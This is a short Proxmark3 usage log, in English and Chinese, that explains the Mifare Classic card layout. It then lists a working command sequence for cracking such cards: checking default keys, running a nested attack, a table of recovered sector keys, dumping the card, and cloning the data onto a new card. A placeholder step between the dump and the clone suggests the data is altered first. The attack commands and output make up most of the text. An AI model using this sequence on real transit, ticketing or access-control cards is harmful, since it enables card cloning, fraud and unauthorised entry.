Proxmark3 Usage Log

What is proxmark3

The Proxmark III is a device developed by Jonathan Westhues that enables sniffing, reading and cloning of RFID (Radio Frequency Identification) tags. For my master thesis I wanted to look at the communication of Mifare Classic cards. Mifare Classic is used in many applications and is the most popular contactless card around. It is used in e-ticketing, public transport and access control. The higher-level protocol is kept secret by the manufacturer (NXP). I made an implementation of the ISO14443 type A standard for the Proxmark since Mifare is based on this communication standard.

what is M1 Card

M1卡有从0-15共16个扇区,每个扇区配备了从0-3共4个段,每个段可以保存16字节的内容。每个扇区的03段是用来保存KeyA,KeyB和控制位的,因为M1卡允许每个扇区有一对独立的密码护,这样能够更加灵活的控制数据的操作,控制位就是这个扇区各种详细权限计算出来的结果。每张M1卡都有一个全球唯一的UID号,这个UID号保存在卡的00扇区的00段,也称为厂商段,其中前4个字节是卡的UID,第5个字节是卡UID的校验位,剩下的是厂商数据。并且这个段在出厂之前就会被设置了写入保护,只能读取不能修改,当然也有例外,有种叫UID卡的特殊卡,UID是没有设置保护的,其实就是厂家不按规范生产的卡。

Logs


// 查看天线工作状态和频率
proxmark3> hw tune

// 按照14a标准读取卡片
proxmark3> hf 14a reader

// 用默认key测试现有分区
proxmark3> hf mf chk *1 ? t

// 用第7block的默认key嗅探秘钥
proxmark3> hf mf nested o 0x07 1 ffffffffffff 1 A

// 利用嗅探出来的key dump所有分区的key
proxmark3> hf mf nested 1 0 A c5f2251a1111 d

|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  bf1ebb3a1111  | 1 |  bf1ebb3a1111  | 1 |          
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|002|  201409032014  | 1 |  ef53cad2923f  | 1 |          
|003|  201409032014  | 1 |  ef53cad2923f  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  863ffa384048  | 1 |  1834746affe8  | 1 |          
|009|  863ffa384048  | 1 |  1834746affe8  | 1 |          
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|015|  201409032014  | 1 |  ef53cad2923f  | 1 |          
|---|----------------|---|----------------|---|          
Printing keys to bynary file dumpkeys.bin...  

// 用 dumpkeys.bin 读取卡内加密数据
proxmark3> hf mf dump
|-----------------------------------------|          
|------ Reading sector access bits...-----|          
|-----------------------------------------|          
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED 

exit

do something here...

// 转换数据用于克隆卡片
python pm3_mfd2eml.py dumpdata.bin test.eml

// 克隆数据到新卡片
proxmark3> hf mf cload test


#####################################################################